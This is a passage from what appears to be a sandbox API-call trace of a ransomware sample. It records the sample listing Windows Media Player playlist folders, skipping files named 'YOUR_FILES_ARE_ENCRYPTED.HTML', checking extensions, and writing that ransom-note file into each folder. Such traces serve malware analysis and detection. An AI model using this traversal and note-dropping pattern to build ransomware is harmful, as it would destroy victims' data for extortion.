lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\*" [0159.347] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0159.397] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.397] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x0, dwReserved1=0x60, cFileName="01_Music_auto_rated_at_5_stars.wpl", cAlternateFileName="01_MUS~1.WPL")) returned 1 [0159.397] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\01_Music_auto_rated_at_5_stars.wpl") returned 125 [0159.398] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.398] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0159.398] lstrlenW (lpString=".wpl") returned 4 [0159.398] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0159.398] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0x0, dwReserved1=0x60, cFileName="02_Music_added_in_the_last_month.wpl", cAlternateFileName="02_MUS~1.WPL")) returned 1 [0159.398] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\02_Music_added_in_the_last_month.wpl") returned 127 [0159.398] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.398] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0159.398] lstrlenW (lpString=".wpl") returned 4 [0159.398] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0159.398] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0x0, dwReserved1=0x60, cFileName="03_Music_rated_at_4_or_5_stars.wpl", cAlternateFileName="03_MUS~1.WPL")) returned 1 [0159.398] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\03_Music_rated_at_4_or_5_stars.wpl") returned 125 [0159.398] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.398] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.398] lstrlenW (lpString=".wpl") returned 4 [0159.398] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.398] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x0, dwReserved1=0x60, cFileName="04_Music_played_in_the_last_month.wpl", cAlternateFileName="04_MUS~1.WPL")) returned 1 [0159.398] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\04_Music_played_in_the_last_month.wpl") returned 128 [0159.398] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.398] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0159.398] lstrlenW (lpString=".wpl") returned 4 [0159.398] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0159.398] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x31d, dwReserved0=0x0, dwReserved1=0x60, cFileName="05_Pictures_taken_in_the_last_month.wpl", cAlternateFileName="05_PIC~1.WPL")) returned 1 [0159.398] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\05_Pictures_taken_in_the_last_month.wpl") returned 130 [0159.398] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.398] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0159.398] lstrlenW (lpString=".wpl") returned 4 [0159.398] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0159.398] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x311, dwReserved0=0x0, dwReserved1=0x60, cFileName="06_Pictures_rated_4_or_5_stars.wpl", cAlternateFileName="06_PIC~1.WPL")) returned 1 [0159.398] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\06_Pictures_rated_4_or_5_stars.wpl") returned 125 [0159.399] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.399] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0159.399] lstrlenW (lpString=".wpl") returned 4 [0159.399] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0159.399] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0x0, dwReserved1=0x60, cFileName="07_TV_recorded_in_the_last_week.wpl", cAlternateFileName="07_TV_~1.WPL")) returned 1 [0159.399] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\07_TV_recorded_in_the_last_week.wpl") returned 126 [0159.399] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.399] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0159.399] lstrlenW (lpString=".wpl") returned 4 [0159.399] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0159.399] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="08_Video_rated_at_4_or_5_stars.wpl", cAlternateFileName="08_VID~1.WPL")) returned 1 [0159.399] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\08_Video_rated_at_4_or_5_stars.wpl") returned 125 [0159.399] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.399] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.399] lstrlenW (lpString=".wpl") returned 4 [0159.399] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.399] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0x0, dwReserved1=0x60, cFileName="09_Music_played_the_most.wpl", cAlternateFileName="09_MUS~1.WPL")) returned 1 [0159.399] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\09_Music_played_the_most.wpl") returned 119 [0159.399] lstrcmpW (lpString1="09_Music_played_the_most.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.399] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0159.399] lstrlenW (lpString=".wpl") returned 4 [0159.399] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0159.399] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x427, dwReserved0=0x0, dwReserved1=0x60, cFileName="10_All_Music.wpl", cAlternateFileName="10_ALL~1.WPL")) returned 1 [0159.399] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\10_All_Music.wpl") returned 107 [0159.399] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.399] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0159.399] lstrlenW (lpString=".wpl") returned 4 [0159.399] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0159.399] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x60, cFileName="11_All_Pictures.wpl", cAlternateFileName="11_ALL~1.WPL")) returned 1 [0159.400] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\11_All_Pictures.wpl") returned 110 [0159.400] lstrcmpW (lpString1="11_All_Pictures.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.400] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0159.400] lstrlenW (lpString=".wpl") returned 4 [0159.400] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0159.400] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 1 [0159.400] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\12_All_Video.wpl") returned 107 [0159.400] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.400] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0159.400] lstrlenW (lpString=".wpl") returned 4 [0159.400] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0159.400] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 0 [0159.400] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0159.401] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0159.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\000080a3\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0159.405] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0159.407] CloseHandle (hObject=0x5b0) returned 1 [0159.407] GetProcessHeap () returned 0x270000 [0159.408] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x746a1d0 | out: hHeap=0x270000) returned 1 [0159.408] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="0000FDBE", cAlternateFileName="")) returned 1 [0159.408] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE") returned 90 [0159.408] GetProcessHeap () returned 0x270000 [0159.408] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x746a1d0 [0159.408] lstrcpyW (in: lpString1=0x746a1d0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE" [0159.408] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*" [0159.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0159.411] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.411] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x0, dwReserved1=0x60, cFileName="01_Music_auto_rated_at_5_stars.wpl", cAlternateFileName="01_MUS~1.WPL")) returned 1 [0159.411] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\01_Music_auto_rated_at_5_stars.wpl") returned 125 [0159.411] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.411] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0159.411] lstrlenW (lpString=".wpl") returned 4 [0159.411] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0159.411] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0x0, dwReserved1=0x60, cFileName="02_Music_added_in_the_last_month.wpl", cAlternateFileName="02_MUS~1.WPL")) returned 1 [0159.411] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\02_Music_added_in_the_last_month.wpl") returned 127 [0159.411] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.411] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0159.411] lstrlenW (lpString=".wpl") returned 4 [0159.411] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0159.411] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0x0, dwReserved1=0x60, cFileName="03_Music_rated_at_4_or_5_stars.wpl", cAlternateFileName="03_MUS~1.WPL")) returned 1 [0159.411] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\03_Music_rated_at_4_or_5_stars.wpl") returned 125 [0159.411] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.411] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.411] lstrlenW (lpString=".wpl") returned 4 [0159.411] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.411] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x0, dwReserved1=0x60, cFileName="04_Music_played_in_the_last_month.wpl", cAlternateFileName="04_MUS~1.WPL")) returned 1 [0159.411] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\04_Music_played_in_the_last_month.wpl") returned 128 [0159.411] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.411] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0159.411] lstrlenW (lpString=".wpl") returned 4 [0159.411] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0159.412] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x31d, dwReserved0=0x0, dwReserved1=0x60, cFileName="05_Pictures_taken_in_the_last_month.wpl", cAlternateFileName="05_PIC~1.WPL")) returned 1 [0159.412] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, 